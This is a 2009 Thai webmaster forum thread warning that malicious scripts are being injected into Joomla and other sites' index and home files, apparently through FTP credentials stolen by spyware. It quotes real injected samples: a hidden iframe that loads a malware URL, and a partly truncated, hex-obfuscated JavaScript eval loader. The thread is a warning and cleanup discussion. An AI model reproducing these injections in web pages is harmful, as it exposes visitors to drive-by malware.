หัวข้อ: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: jupiterjan ที่ 16 กุมภาพันธ์ 2009, 10:57:21 โค๊ด: ?<html><body><iframe src="http://bestlotron.cn/in.cgi?cocacola52" width=1 height=1 style="visibility: hidden"></iframe></body></html> ประมาณนี้ครับ (ใน index.php,html) สงสัย secure ไม่ดี ยิ่งมือใหม่ด้วย :'( หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: ndesigns ที่ 16 กุมภาพันธ์ 2009, 11:14:53 ตัวนี้มันจะเจาะเข้าที่โฮสแล้วไปฝังในไฟล์ index.php index.html home.php ลองเช็คกันดูนะคับผมโดนไปหลายโฮส :P
หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: BosnoS ที่ 16 กุมภาพันธ์ 2009, 11:16:02 โดนกันทั่วครับ ขอให้ชื่อไพล์มีคำว่า index มันฝังหมดล่ะ
ขนาดเว็บผมเขียนเองนะ ไม่มีสคริปแจกฟรีเลย ก็ยังโดน แต่ล่าสุดไม่โดนมาหลายวันล่ะ ไปแล้วมั่ง :D หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: Step9 ที่ 16 กุมภาพันธ์ 2009, 11:19:38 :-\ เหมือนกันครับ
http://www.thaiseoboard.com/index.php/topic,51342.0.html หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: tosakp ที่ 16 กุมภาพันธ์ 2009, 11:20:45 ใน index.xxx home.xxx default.xxx
.xxx ก็มี .html .htm .php โดนกันทั่วหน้า ผมเขียน code แก้ประมาณนี้ ชื่อไฟล์ fixed.php เอาไปใส่ที่ root ของโดเมน แล้วก็เรียกมัน การทำงาน ===== - มันจะเปิด ไฟล์ index.xxx และ home.xxx มาแล้วสั่ง replace code ที่มันฝังมาด้วย ว่างๆ - จะเปิดโฟล์เดอร์ภายใต้ไปเรื่อยๆ เพื่อหาไฟล์ index.xxx และ home.xxx หมายเหตุ: - code ที่ฝั่งแต่ละคนไม่เหมือนกันนะครับ แก้ไฟล์เอาเอง โค๊ด: <? หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: nongmy ที่ 16 กุมภาพันธ์ 2009, 11:23:23 โดนเหมือนกัน
้Host แบนเลย บอกว่า IDC CAT แจ้ง หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: jupiterjan ที่ 16 กุมภาพันธ์ 2009, 11:43:42 ใน index.xxx home.xxx default.xxx .xxx ก็มี .html .htm .php โดนกันทั่วหน้า ผมเขียน code แก้ประมาณนี้ ชื่อไฟล์ fixed.php เอาไปใส่ที่ root ของโดเมน แล้วก็เรียกมัน การทำงาน ===== - มันจะเปิด ไฟล์ index.xxx และ home.xxx มาแล้วสั่ง replace code ที่มันฝังมาด้วย ว่างๆ - จะเปิดโฟล์เดอร์ภายใต้ไปเรื่อยๆ เพื่อหาไฟล์ index.xxx และ home.xxx หมายเหตุ: - code ที่ฝั่งแต่ละคนไม่เหมือนกันนะครับ แก้ไฟล์เอาเอง โค๊ด: <? ขอบคุณครับ เดี๋ยวไปมั่วดู :-* หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: swk317 ที่ 16 กุมภาพันธ์ 2009, 11:47:00 น่ากลัว
หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: BosnoS ที่ 16 กุมภาพันธ์ 2009, 11:49:10 ขอบคุณมากครับ คุณต่อ
หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: wingolfer ที่ 16 กุมภาพันธ์ 2009, 14:55:22 ขอบคุณครับ จะเข้าไปเช็คมั้ง
หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: rapeedu ที่ 19 กุมภาพันธ์ 2009, 15:56:58 ขอบคุณมากครับ ที่ บ. ผมก็โดนวันนี้เองครับ มันติดมาจากเครื่อง PC, Laptop ที่ติด Spyware ตัวนี้ พอ ftp ไปเข้า server มันจะติดด้วยในทันที และทำการ แก้ไขไฟล์เราเลยครับ
ก่อน ftp เช็คเครื่องตนเองก่อนนะครับ หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: TAXZe ที่ 19 กุมภาพันธ์ 2009, 18:20:24 ขอบคุณครับ
โค้ดด้วยๆ ^0^ หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: Uesugi ที่ 19 กุมภาพันธ์ 2009, 18:36:55 ขอบคุณมากครับ ใช้ Joomla เหมือนกันครับ
ชักผวาแล้วสิ เดี๋ยวต้องไปเช็คดูซะแล้ว :P หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: offf ที่ 19 กุมภาพันธ์ 2009, 18:45:23 ขอบคุณครับ
หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: othpiik ที่ 19 กุมภาพันธ์ 2009, 18:52:33 ตอนนี้หันมาเล่น CakePHP ครับ กำลังสนุกเลย ไม่รู้จะโดนไหมยังไม่ได้อัพเว้บไซต์ด้วย ???
หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: lilly ที่ 19 กุมภาพันธ์ 2009, 19:23:56 ขอบคุณค่ะ ... แต่แก้ไม่เป็น จะทำไงดีคะเนี่ย
ถ้าลบแ ค่ส่วนนั้นออกไป จะกระทบส่วนอื่นๆด้วยไหมคะ ??? หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: sunboy ที่ 20 กุมภาพันธ์ 2009, 12:55:44 ถ้าโดน spyware ผ่าน ftp ใช้โปรแกรมอื่นที่ไม่ใช่ joomla ก็ต้องระวังเหมือนกันนะครับ สรุปว่าต้องหมั่นอัพเดทโปรแกรมแอนตี้ไวรัสครับ
หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: anupol_Tex ที่ 20 กุมภาพันธ์ 2009, 13:29:58 โลกหน่อโลก ทำไมช่างโหดร้ายอย่างนี้ เท่าที่นับ โดนมา 7 รอบแล้ว
หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: Rungson ที่ 22 กุมภาพันธ์ 2009, 14:10:40 เหอะๆๆ มันเป็นเรื่องธรรมดานะครับ แต่ก็ไม่น่าทำกันเลย
ของผมดีที่ทาง host เค้าดูแลดี ;D ;D ;D หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: asshur ที่ 23 มีนาคม 2009, 15:45:41 สดๆ
โค๊ด: <span id='ffafd4f392da093e46a731f167f8a26638'><script type="text/javascript">var jj=window["e"+new String("v")+"a"+new String("l")]("e"+new String("v")+"a"+new String("l")); jj('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x68\x69\x59\x35\x53\x4f\x71\x6d\x28\x63\x7a\x6c\x4f\x76\x59\x75\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x66\x68\x53\x4c\x6a\x30\x28\x66\x45\x67\x4d\x29\x7b\x76\x61\x72\x20\x69\x69\x76\x42\x4d\x3d\x30\x3b\x76\x61\x72\x20\x73\x79\x56\x30\x44\x3d\x66\x45\x67\x4d\x2e\x6c\x65\x6e\x67\x74\x68\x2c\x20\x6d\x43\x78\x6f\x6d\x6d\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x6d\x43\x78\x6f\x6d\x6d\x3c\x73\x79\x56\x30\x44\x29\x7b\x69\x69\x76\x42\x4d\x2b\x3d\x6a\x38\x4f\x28\x66\x45\x67\x4d\x2c\x6d\x43\x78\x6f\x6d\x6d\x29\x2a\x73\x79\x56\x30\x44\x3b\x6d\x43\x78\x6f\x6d\x6d\x2b\x2b\x3b\x7d\x72\x65\x74\x75\x72\x6e\x20\x28\x69\x69\x76\x42\x4d\x2b\x27\x27\x29\x3b\x7d\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6a\x38\x4f\x28\x74\x37\x74\x6e\x45\x33\x2c\x6e\x5a\x79\x52\x4c\x29\x7b\x72\x65\x74\x75\x72\x6e\x20\x74\x37\x74\x6e\x45\x33\x2e\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74\x28\x6e\x5a\x79\x52\x4c\x29\x3b\x7d\x20\x20\x20\x74\x72\x79\x20\x7b\x76\x61\x72\x20\x70\x56\x65\x4e\x33\x3d\x65\x76\x61\x6c\x28\x27\x61\x23\x72\x4c\x67\x47\x75\x23\x6d\x47\x65\x4c\x6e\x5e\x74\x4c\x73\x23\x2e\x4c\x63\x46\x61\x23\x6c\x23\x6c\x4c\x65\x46\x65\x5e\x27\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5b\x5c\x5e\x23\x47\x46\x4c\x5d\x2f\x67\x2c\x20\x27\x27\x29\x29\x2c\x66\x49\x55\x55\x50\x57\x57\x3d\x27\x27\x2c\x6e\x35\x63\x72\x3d\x30\x2c\x66\x61\x50\x5a\x3d\x30\x3b\x76\x61\x72\x20\x6e\x70\x76\x61\x6b\x3d\x28\x6e\x65\x77\x20\x53\x74\x72\x69\x6e\x67\x28\x70\x56\x65\x4e\x33\x29\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x28\x2f\x5b\x5e\x40\x61\x2d\x7a\x30\x2d\x39\x41\x2d\x5a\x5f\x2e\x2c\x2d\x5d\x2f\x67\x2c\x27\x27\x29\x3b\x76\x61\x72\x20\x7a\x58\x32\x7a\x78\x69\x3d\x66\x68\x53\x4c\x6a\x30\x28\x6e\x70\x76\x61\x6b\x29\x3b\x63\x7a\x6c\x4f\x76\x59\x75\x3d\x75\x6e\x65\x73\x63\x61\x70\x65\x28\x63\x7a\x6c\x4f\x76\x59\x75\x29\x3b\x66\x6f\x72\x28\x76\x61\x72\x20\x6a\x57\x62\x58\x3d\x30\x3b\x20\x6a\x57\x62\x58\x20\x3c\x20\x28\x63\x7a\x6c\x4f\x76\x59\x75\x2e\x6c\x65\x6e\x67\x74\x68\x29\x3b\x20\x6a\x57\x62\x58\x2b\x2b\x29\x7b\x76\x61\x72\x20\x7a\x6c\x73\x73\x63\x51\x3d\x6a\x38\x4f\x28\x6e\x70\x76\x61\x6b\x2c\x6e\x35\x63\x72\x29\x5e\x6a\x38\x4f\x28\x7a\x58\x32\x7a\x78\x69\x2c\x66\x61\x50\x5a\x29\x3b\x76\x61\x72\x20\x74\x48\x59\x39\x66\x66\x77\x3d\x6a\x38\x4f\x28\x63\x7a\x6c\x4f\x76\x59\x75\x2c\x6a\x57\x62\x58\x29\x3b\x6e\x35\x63\x72\x2b\x2b\x2c\x66\x61\x50\x5a\x2b\x2b\x3b\x66\x49\x55\x55\x50\x57\x57\x2b\x3d\x53\x74\x72\x69\x6e\x67\x2e\x66\x72\x6f\x6d\x43\x68\x61\x72\x43'); </script></span> ต้องลบ code มันออกเยอะกว่าจะโพสท์ได้ หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: chui761 ที่ 23 มีนาคม 2009, 21:06:58 อย่างนี้ต้องไปเช็คหน่อยแร้ว
ช่วงนี้เว็บยิ่งอืดๆ อยู่ หรือว่าโดนไปแล้วเนี่ย :o หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: eabby ที่ 31 พฤษภาคม 2009, 18:20:49 ต้องนั่งเช็คทีละ file เลยหรือเปล่าครับ :P
หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: nongmai ที่ 31 พฤษภาคม 2009, 18:54:54 ผมเคยโดนไปแล้วครั้งหนึ่ง Google แจ้งเตือนว่าเว็บไซต์นี้เป้นอันตรายต่อคอมพิวเตอร์ของคุณ
ทราฟฟิกหายไปเลย แต่ปัญหาที่เกิดจากเครื่องคอมเราเองครับ ยังไงก็ระวังด้วยน่ะ หัวข้อ: Re: มาเตือนครับ โดนฝัง script ใน joomla เริ่มหัวข้อโดย: klab ที่ 31 พฤษภาคม 2009, 18:57:55 คุณ nongmai เป็นอะไรกับ คุณครู bugmai หว่า ;D
|